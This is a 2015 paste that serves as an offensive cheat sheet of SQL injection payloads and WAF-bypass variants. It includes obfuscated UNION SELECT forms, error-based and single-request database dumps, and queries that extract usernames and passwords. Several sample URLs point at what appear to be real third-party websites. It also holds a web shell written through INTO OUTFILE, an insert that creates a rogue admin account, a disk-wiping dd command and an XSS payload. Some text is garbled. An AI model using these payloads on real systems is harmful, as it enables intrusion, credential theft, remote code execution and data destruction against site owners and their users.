Kyfx

SQLI Injection WAF Bypass Methods With Details

Mar 19th, 2015
  1. SQLI Injection WAF Bypass Methods With Details
  2. ----------------------------------------------
  3. --'- : +--+ / : -- - : --+- : /*
  4. ) order by 1-- -
  5. ') order by 1-- -
  6.  
  7. ')order by 1%23%23
  8.  
  9. %')order by 1%23%23
  10.  
  11. Null' order by 100--+
  12.  
  13. Null' order by 9999--+
  14.  
  15. ')group by 99-- -
  16.  
  17. 'group by 119449-- -
  18.  
  19. 'group/**/by/**/99%23%23
  20.  
  21. union select ByPassing method
  22.  
  23. +union+distinct+select+
  24.  
  25. +union+distinctROW+select+
  26.  
  27. /**//*!12345UNION SELECT*//**/
  28.  
  29. /**//*!50000UNION SELECT*//**/
  30.  
  31. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  32.  
  33. +/*!u%6eion*/+/*!se%6cect*/+
  34.  
  35. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  36.  
  37. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  38.  
  39. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  40.  
  41. union /*!50000%53elect*/
  42.  
  43. %55nion %53elect
  44.  
  45. +--+Union+--+Select+--+
  46.  
  47. +UnIoN/*&a=*/SeLeCT/*&a=*/
  48.  
  49. id=1+�UnI�On�+'SeL�ECT�
  50.  
  51. id=1+'UnI'||'on'+SeLeCT'
  52.  
  53. UnIoN SeLeCt CoNcAt(version())--
  54.  
  55. uNiOn aLl sElEcT
  56.  
  57. uUNIONnion all sSELECTelect
  58.  
  59. ===================================================================================================================================
  60. :: Buffer Overflow ::
  61. ===================================================================================================================================
  62. +And(select 1)=(select 0�414)+union+select+1�
  63.  
  64. +And(select 1)=(select 0xAAAA)+union+select+1�
  65.  
  66. +And(select 1)=(select 0�4141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141)+
  67.  
  68. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  69.  
  70. ==================================================================================================================================
  71. :: 400 Bad Request ::
  72. ==================================================================================================================================
  73. �+%0A
  74.  
  75. union+select+1�+%0A,2�+%0A,3�+%0A,4�+%0A,5�+%0A �
  76.  
  77. ==================================================================================================================================
  78. null the parameter
  79. ==================================================================================================================================
  80. id=-1
  81.  
  82. id=null
  83.  
  84. id=1+and+false+
  85.  
  86. id=9999
  87.  
  88. id=1 and 0
  89.  
  90. id==1
  91.  
  92. id=(-1)
  93.  
  94. =======================================================================================================================================
  95. Group_Concat
  96. =======================================================================================================================================
  97. Group_Concat
  98.  
  99. group_concat()
  100.  
  101. /*!group_concat*/()
  102.  
  103. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  104.  
  105. group_concat(,0x3c62723e)
  106.  
  107. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
  108.  
  109. CoNcAt()
  110.  
  111. CONCAT(DISTINCT Version())
  112.  
  113. concat(,0x3a,)
  114.  
  115. concat%00()
  116.  
  117. %00CoNcAt()
  118.  
  119. /*!50000cOnCat*/(/*!Version()*/)
  120.  
  121. /*!50000cOnCat*/
  122.  
  123. /**//*!12345cOnCat*/(,0x3a,)
  124.  
  125. concat_ws()
  126.  
  127. concat(0x3a,,0x3c62723e)
  128.  
  129. /*!concat_ws(0x3a,)*/
  130.  
  131. concat_ws(0x3a3a3a,version()
  132.  
  133. CONCAT_WS(CHAR(32,58,32),version(),)
  134.  
  135. REVERSE(tacnoc)
  136.  
  137. binary(version())
  138.  
  139. uncompress(compress(version()))
  140.  
  141. aes_decrypt(aes_encrypt(version(),1),1)
  142.  
  143. ====================================================================================================================================
  144. To make the column number appear in the page, put this after id
  145. ====================================================================================================================================
  146. id=1+and+1=0+union+select+1,2,3,4,5,6
  147.  
  148. +AND+1=0
  149.  
  150. /*!aND*/ 1 like 0
  151.  
  152. +/*!and*/+1=0
  153.  
  154. +and+2>3+
  155.  
  156. +and(1)=(0)
  157.  
  158. and (1)!=(0)
  159.  
  160. +div+0
  161.  
  162. Having+1=0
  163.  
  164. ===================================================================================================================================
  165. function ByPassing
  166. ===================================================================================================================================
  167. unhex(hex(value))
  168.  
  169. cast(value as char)
  170.  
  171. uncompress(compress(version()))
  172.  
  173. cast(version() as char)
  174.  
  175. aes_decrypt(aes_encrypt(version(),1),1)
  176.  
  177. binary(version())
  178.  
  179. convert(value using ascii)
  180.  
  181. ===================================================================================================================================
  182. avoid source page injection
  183. ===================================================================================================================================
  184. concat(?�>,
  185.  
  186.  
  187. ,@@version,?
  188.  
  189. �>
  190. ?
  191.  
  192. injection
  193.  
  194. concat(0x223e,@@version)
  195.  
  196. concat(0x273e27,version(),0x3c212d2d)
  197.  
  198. concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
  199.  
  200. concat(0x223e,@@version,0x3c696d67207372633d22)
  201.  
  202. concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)
  203.  
  204. concat(0x223e3c62723e,@@version,0x3a,�BlackRose�,0x3c696d67207372633d22)
  205.  
  206. concat(��,@@version,��)
  207.  
  208. concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
  209.  
  210. concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
  211.  
  212. ===================================================================================================================================
  213. get version - DB_NAME - user - HOST_NAME - datadir
  214. ===================================================================================================================================
  215. version()
  216.  
  217. convert(version() using latin1)
  218.  
  219. unhex(hex(version()))
  220.  
  221. @@GLOBAL.VERSION
  222.  
  223. (substr(@@version,1,1)=5) :: 1 true 0 false
  224.  
  225. # like #
  226.  
  227. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 �
  228.  
  229. ==================================================================================================================================
  230. +and substring(version(),1,1)=4
  231.  
  232. +and substring(version(),1,1)=5
  233.  
  234. +and substring(version(),1,1)=9
  235.  
  236. +and substring(version(),1,1)=10
  237.  
  238. id=1 /*!50094aaaa*/ error
  239.  
  240. id=1 /*!50095aaaa*/ no error
  241.  
  242. id=1 /*!50096aaaa*/ error
  243.  
  244. # like # http://www.marinaplast.com/page.php?id=13 /*!50095aaaa*/
  245.  
  246. id=1 /*!40123 1=1*/�+- no error
  247.  
  248. id=1 /*!40122rrrr*/ no error
  249.  
  250. # like # http://www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4
  251. =================================================================================================================================
  252. DB_NAME()
  253. =================================================================================================================================
  254. @@database
  255. database()
  256. id=vv()
  257. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 �
  258. http://www.marinaplast.com/page.php?id=vv()
  259. @@user
  260. user()
  261. user_name()
  262. system_user()
  263. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 �
  264.  
  265. HOST_NAME()
  266. @@hostname
  267. @@servername
  268. SERVERPROPERTY()
  269.  
  270. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 �
  271. @@datadir
  272. datadir()
  273. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 �
  274. ASPX
  275. and 1=0/@@version
  276. � and 1=0/@@version;�
  277. �) and 1=@@version�
  278. and 1=0/user;�
  279.  
  280. Requested method
  281. [DUMP DB in 1 Request]
  282.  
  283. (select (@) from (select(@:=0�00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,� [ ',table_schema,' ] >�,table_name,� > �,column_name))))x)
  284.  
  285. (select(@) from (select (@:=0�00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)
  286. ===================================================================================================================================
  287. [DUMP DB in 1 Request improve]
  288. ===================================================================================================================================
  289.  
  290. (select(@x)from(select(@x:=0�00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0�00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)
  291.  
  292. like
  293. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0�00),(select(0)from(information_schema.colu mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0�00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 �
  294. ===================================================================================================================================
  295. #2#
  296. ===================================================================================================================================
  297. method like DUMP DB in 1 Request
  298. ===================================================================================================================================
  299. concat(@i:=0�00,@o:=0xd0a,benchmark(40,@o:=CONCAT( @o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1)))
  300. like
  301. http://www.mishnetorah.com/shop/details.php?id=-26+union+select+1,2,3,concat(@i:=0�00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a ,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21
  302. ===================================================================================================================================
  303. #3#
  304. ===================================================================================================================================
  305. databases
  306.  
  307. (select+count(schema_name) +from+information_schema.schemata)
  308.  
  309. # like #
  310. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 �
  311.  
  312. tables
  313. (select+count(table_name) +from+information_schema.tables)
  314. # like #
  315. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 �
  316.  
  317. columns
  318. (select+count(column_name) +from+information_schema.columns)
  319. # like #
  320. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 �
  321. ===================================================================================================================================
  322. #4#
  323. ===================================================================================================================================
  324. show the table with all its columns
  325.  
  326. CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))
  327.  
  328. +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1�+
  329.  
  330. like
  331. http://www.marinaplast.com/page.php?id=-13 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1�+
  332. ===================================================================================================================================
  333. #5#WWWWWWWWWWWAAAAAAAAAAAAAAAAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
  334. ===================================================================================================================================
  335. filtered requests
  336.  
  337. # tables #
  338. group_concat(/*!table_name*/)
  339.  
  340. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES� -
  341.  
  342. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()� -
  343.  
  344. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()� -
  345. ===================================================================================================================================
  346. # columns #
  347. ===================================================================================================================================
  348. group_concat(/*!column_name*/)
  349.  
  350. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  351.  
  352. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  353.  
  354. /*!froM*/ table� -
  355. ===================================================================================================================================
  356. #6#
  357. ===================================================================================================================================
  358. bypass method
  359.  
  360. (select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
  361.  
  362. (select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
  363.  
  364. like
  365. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 �
  366. ===================================================================================================================================
  367. #7#
  368. ===================================================================================================================================
  369. bypass method
  370.  
  371. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
  372.  
  373. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
  374.  
  375. like
  376. http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)�
  377.  
  378. ===================================================================================================================================
  379. [+] Union Select:
  380. ===================================================================================================================================
  381. union /*!select*/+
  382. union/**/select/**/
  383. /**/union/**/select/**/
  384. /**/union/*!50000select*/
  385. /**//*!12345UNION SELECT*//**/
  386. /**//*!50000UNION SELECT*//**/
  387. /**/uniUNIONon/**/selSELECTect/**/
  388. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  389. /**//*!union*//**//*!select*//**/
  390. /**/UNunionION/**/SELselectECT/**/
  391. /**//*UnIOn*//**//*SEleCt*//**/
  392. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  393. /**/UNunionION/**/all/**/SELselectECT/**/
  394. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  395. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  396. uni
  397. %20union%20/*!select*/%20
  398. union%23aa%0Aselect
  399. union+distinct+select+
  400. union+distinctROW+select+
  401. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  402. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  403. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  404. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  405. /*!u%6eion*/+/*!se%6cect*/+
  406. 1%�)and(0)union(select(1),version(),3,4,5,6)%23%23%23
  407. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  408. union /*!50000%53elect*/
  409. +%2F**/+Union/*!select*/
  410. %55nion %53elect
  411. +�+Union+�+Select+�+
  412. +UnIoN/*&a=*/SeLeCT/*&a=*/
  413. uNiOn aLl sElEcT
  414. uUNIONnion all sSELECTelect
  415. union(select(1),2,3)
  416. union (select 1111,2222,3333)
  417. union (/*!/**/ SeleCT */ 11)
  418. %0A%09UNION%0CSELECT%10NULL%
  419. /*!union*//*�*//*!all*//*�*//*!select*/
  420. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  421. union+sel%0bect
  422. +uni*on+sel*ect+
  423. +#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  424. union(select (1),(2),(3),(4),(5))
  425. UNION(SELECT(column)FROM(table))
  426. id=1+�UnI�On�+�SeL�ECT�
  427. id=1+�UnI�||�on�+SeLeCT�
  428. union select 1�+%0A,2�+%0A,3�+%0A etc �.
  429. ===================================================================================================================================
  430. [+] Buffer overflow:
  431. ===================================================================================================================================
  432. +And(select 1)=(select 0�414)+union+select+1�
  433. +And(select 1)=(select 0xAAAA)+union+select+1�
  434. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  435. +and (/*!select*/ 1)=(/*!select*/ 0�414)+
  436. +And(select 1)=(select 0�4141414141414141414141414141414141414141414141414141414141414141414141414?1414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141414141414141414141414141414141414141414141414141414141414141414141414?141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 4141)+
  437. ===================================================================================================================================
  438. [+] Group Concat:
  439. ===================================================================================================================================
  440. Group_Concat
  441. group_concat()
  442. /*!group_concat*/()
  443. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  444. group_concat(,0x3c62723e)
  445. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29
  446. CoNcAt()
  447. CONCAT(DISTINCT Version())
  448. concat(,0x3a,)
  449. concat%00()
  450. %00CoNcAt()
  451. /*!50000cOnCat*/(/*!Version()*/)
  452. /*!50000cOnCat*/
  453. /**//*!12345cOnCat*/(,0x3a,)
  454. concat_ws()
  455. concat(0x3a,,0x3c62723e)
  456. /*!concat_ws(0x3a,)*/
  457. concat_ws(0x3a3a3a,version()
  458. CONCAT_WS(CHAR(32,58,32),version(),)
  459. ===================================================================================================================================
  460. ERROR BASED
  461. ===================================================================================================================================
  462. =21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1�
  463.  
  464. Database
  465.  
  466. 21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  467.  
  468. Table_name
  469.  
  470. and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  471.  
  472. Columns
  473.  
  474. 21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  475.  
  476. extract data
  477.  
  478. http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  479.  
  480. Notice the limit clause in the query.
  481. A website can have more than two databases, so increase the limit until you find all database names.
  482. Example: limit 0,1 or limit 1,1 or limit 2,1
  483. ===================================================================================================================================
  484. Differences:
  485. Error Based Query for Database Extraction:
  486. ===================================================================================================================================
  487. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  488.  
  489. Double Query for Database Extraction:
  490.  
  491. and(select 1 from(select count(*),concat((select (select concat(0x7e,0�27,cast(database() as char),0�27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  492. information_schema.tables group by x)a) and 1=1
  493.  
  494. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  495. concat(0x7e,0�27,cast(schema_name as char),0�27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
  496. information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  497.  
  498. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  499. concat(0x7e,0�27,cast(table_name as char),0�27,0x7e) FROM information_schema.tables Where
  500. table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  501. information_schema.tables group by x)a) and 1
  502. ===================================================================================================================================
  503. WUBI +and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))�+
  504. ===================================================================================================================================
  505.  
  506. Descarci orice linux live, bootezi dupa el si formatezi cu dd+urandom. De acolo nu mai recupereaza NIMENI ceva.
  507. Code: dd if=/dev/urandom of=/dev/sda bs=1M
  508.  
  509. I'd say using concat(0xY)
  510.  
  511. Y being �� in hex
  512. union select concat(version,0x3c7363726970743e616c6572742827706833776c27293c2f7363726970743e)
  513.  
  514. http://zerocoolhf.altervista.org/level2.php?id=-1%27%20union%20select%20*%20from%28%28select%201%29a%20join%20%28select%20version%28%29%29b%20join%20%28select%20database%28%29%29c%29�+
  515.  
  516. union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=concat(�0x�, hex(�users�)
  517.  
  518. =113'+and+0+union+select+1,(SELECT (@) FROM (SELECT(@:=0�00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x3C7363726970743E616C6572742827,� [ ',table_schema,' ] >�,table_name,� > �,column_name,0x27293B3C2F7363726970743E))))x),3�+�
  519.  
  520. injection into the SQL database: add a new user
  521. INSERT INTO admins (`name`,`password`,`email`) VALUES (�unix�,'unixunix�,'[email protected]�)
  522.  
  523. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  524.  
  525. CHALLENGES
  526.  
  527. Code:
  528. =(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(information_schema.columns)where(table_schema=database())and(table_name=0�7365637572697479))�+-
  529. =12+and+false/*!union*/ /*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,0x3c666f6e7420636f6c6f723d626c75653e3c68323e706833776c,15 from information_schema.tables where table_schema=0x66616272697a696f5f636572697070 LiMit 0,1�
  530. =/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security�
  531. =121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7� -
  532. =121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)�+-
  533. =121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# |
  534. null�+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata� x
  535. ===================================================================================================================================
  536. Error Based:
  537. ===================================================================================================================================
  538. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1�
  539.  
  540. or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150)
  541.  
  542. from rmdsz_user),floor(rand(0)*2)) having min(0) or 1� -
  543. or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 � -
  544.  
  545. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  546.  
  547. +AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
  548.  
  549. +and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_ schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)� x
  550.  
  551. or 1=convert(int,(@@version))-
  552. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1�
  553. +and+(select+1+from+(select+count(*),concat((select(select+concat(c ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0, 1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  554.  
  555. (42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75653e706833776c,7,8,9,(10))�+-
  556. ===================================================================================================================================
  557. WAF BYPASS BY TOTTI
  558. ===================================================================================================================================
  559.  
  560. =-2/*1337*/UNION/*1337*/(SELECT/*1337*/1337,concat_ws(0x203a20,0x746f7474693933,table_nam e)/*1337*/FROM/*1337*/INFORMATION_SCHEMA./*!TABLES*//*1337*/WHERE/*1337*/TABLE_SCHEMA=database())� -
  561.  
  562. =2+and(0)+union+distinctROW+select+1,/*!50000CoNcaT*/(0x706833776c,0x3a,table_name) /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()� -
  563.  
  564. ===================================================================================================================================
  565. WUBI � 1,(select(@x)from(select(@x:=0�00),(select(0)from(information_schema.columns)where(table_schema!=0�69)and(0�00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2020203d3e3e202020,table_name,0x20203a3a3a32020,column_name))))x),3,4�
  566.  
  567. (select (@) from (select(@:=0�00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,� [ ',table_schema,' ] >�,table_name,� > �,column_name))))x)
  568. (select (@) from (select (@x:=0�00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  569.  
  570. (select (@) from (select (@x:=0�00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  571. ===================================================================================================================================
  572.  
  573. +and+1=convert(int,SERVERPROPERTY(�ProductVersion�))
  574. ===================================================================================================================================
  575.  
  576. http://zerofreak.blogspot.it/2012/02/tutorial-by-zer0freak-zer0freak-sqli.html
  577.  
  578. http://www.websec.ca/kb/sql_injection
  579.  
  580. http://www.hellboundhackers.org/articles/862-mysql-injection-complete-tutorial.html
  581.  
  582. ===================================================================================================================================
  583. test
  584.  
  585. http://www.mt.ro/nou/articol.php?id=-angajari�+and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))�+
  586.  
  587. �������������..
  588. http://www.mt.ro/nou/articol.php?id=-angajari� and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x64625f6d74 limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)�+
  589.  
  590. SELECT � system($_REQUEST['cmd']); ?>�
  591. INTO OUTFILE �full/path/here/cmd.php�
  592.  
  593.  
  594.  
  595. ------------Best Bypass WAF------------
  596. ========================
  597.  
  598. [~] order by [~]
  599. /**/ORDER/**/BY/**/
  600. /*!order*/+/*!by*/
  601. /*!ORDER BY*/
  602. /*!50000ORDER BY*/
  603. /*!50000ORDER*//**//*!50000BY*/
  604. /*!12345ORDER*/+/*!BY*/
  605.  
  606. [~] UNION select [~]
  607. /*!00000Union*/ /*!00000Select*/
  608. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  609. %55nion %53elect
  610. %55nion(%53elect 1,2,3)-- -
  611. +union+distinct+select+
  612. +union+distinctROW+select+
  613. /**//*!12345UNION SELECT*//**/
  614. /**//*!50000UNION SELECT*//**/
  615. /**/UNION/**//*!50000SELECT*//**/
  616. /*!50000UniON SeLeCt*/
  617. union /*!50000%53elect*/
  618. + #?uNiOn + #?sEleCt
  619. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  620. /*!%55NiOn*/ /*!%53eLEct*/
  621. /*!u%6eion*/ /*!se%6cect*/
  622. +un/**/ion+se/**/lect
  623. uni%0bon+se%0blect
  624. %2f**%2funion%2f**%2fselect
  625. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  626. REVERSE(noinu)+REVERSE(tceles)
  627. /*--*/union/*--*/select/*--*/
  628. union (/*!/**/ SeleCT */ 1,2,3)
  629. /*!union*/+/*!select*/
  630. union+/*!select*/
  631. /**/union/**/select/**/
  632. /**/uNIon/**/sEleCt/**/
  633. +%2F**/+Union/*!select*/
  634. /**//*!union*//**//*!select*//**/
  635. /*!uNIOn*/ /*!SelECt*/
  636. +union+distinct+select+
  637. +union+distinctROW+select+
  638. uNiOn aLl sElEcT
  639. UNIunionON+SELselectECT
  640. /**/union/*!50000select*//**/
  641. 0%a0union%a0select%09
  642. %0Aunion%0Aselect%0A
  643. %55nion/**/%53elect
  644. uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  645. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  646. %0A%09UNION%0CSELECT%10NULL%
  647. /*!union*//*--*//*!all*//*--*//*!select*/
  648. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  649. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  650. +UnIoN/*&a=*/SeLeCT/*&a=*/
  651. union+sel%0bect
  652. +uni*on+sel*ect+
  653. +#1q%0Aunion all#qa%0A#%0Aselect
  654. union(select (1),(2),(3),(4),(5))
  655. UNION(SELECT(column)FROM(table))
  656. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  657. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  658. union(select(1),2,3)
  659. union (select 1111,2222,3333)
  660. uNioN (/*!/**/ SeleCT */ 11)
  661. union (select 1111,2222,3333)
  662. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  663. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  664. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  665. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  666. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  667. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  668. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  669. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  670. /union\sselect/g
  671. /union\s+select/i
  672. /*!UnIoN*/SeLeCT
  673. +UnIoN/*&a=*/SeLeCT/*&a=*/
  674. +uni>on+sel>ect+
  675. +(UnIoN)+(SelECT)+
  676. +(UnI)(oN)+(SeL)(EcT)
  677. +�UnI�On�+'SeL�ECT�
  678. +uni on+sel ect+
  679. +/*!UnIoN*/+/*!SeLeCt*/+
